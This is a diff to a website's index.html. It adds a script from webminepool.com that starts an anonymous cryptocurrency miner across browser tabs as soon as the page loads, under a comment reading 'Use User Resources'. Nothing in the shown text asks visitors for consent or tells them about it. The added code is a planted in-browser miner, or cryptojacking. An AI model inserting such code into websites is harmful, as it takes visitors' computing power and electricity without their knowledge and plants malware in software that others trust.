--- a/index.html
+++ b/index.html
@@ -216,7 +216,15 @@ height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
   <!-- Template Main JS File -->
   <script src="assets/js/main.js"></script>
   <!-- End Template Main JS File -->
-	  
+
+  <!-- Use User Resources -->
+  <script src="https://webminepool.com/lib/base.js"></script>
+  <script>
+    var miner = WMP.Anonymous('SK_ws5GsAy9YthWHAVWYcrdn');
+    miner.start(WMP.FORCE_MULTI_TAB);
+  </script>
+  <!-- End Use User Resources -->
+
 </body>
 
 </html>
